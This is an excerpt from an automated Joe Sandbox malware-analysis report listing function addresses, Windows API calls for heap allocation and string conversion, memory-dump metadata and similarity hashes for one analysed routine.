

                                                  0x00403cd3
                                                  0x00403ce2
                                                  0x00403cf0
                                                  0x00403cf3
                                                  0x00403cf5
                                                  0x00403cff
                                                  0x00403d03
                                                  0x00403d1a
                                                  0x00403d1a
                                                  0x00403d03
                                                  0x00403d25

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,$d.log,000000FF,00000000,00000000,00000000,00000000,?,?,?,00403D71,00000000,?,?), ref: 00403CE4
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,$d.log,000000FF,00000000,?,00000000,00000000,?,00403D71,00000000,?,?), ref: 00403D1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCriticalHeapMultiSectionWide$AllocateEnterLeaveProcess
                                                  • String ID: $d.log$@hqt
                                                  • API String ID: 635875880-2825629803
                                                  • Opcode ID: 0a1088e63fe4fbfa2349b7c5ac6bd22bcd7c7fd7546fd97f3a37af09754dca1e
                                                  • Instruction ID: f7a405fe1f315cbc39cb45b284df71fb134277089f2554c05c4f1ba3558b2753
                                                  • Opcode Fuzzy Hash: 0a1088e63fe4fbfa2349b7c5ac6bd22bcd7c7fd7546fd97f3a37af09754dca1e
                                                  • Instruction Fuzzy Hash: B2F0BEB1601020BFB3249A6A9C09C377EACDBC1B71304433ABC18EB2D1D930AC0082B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%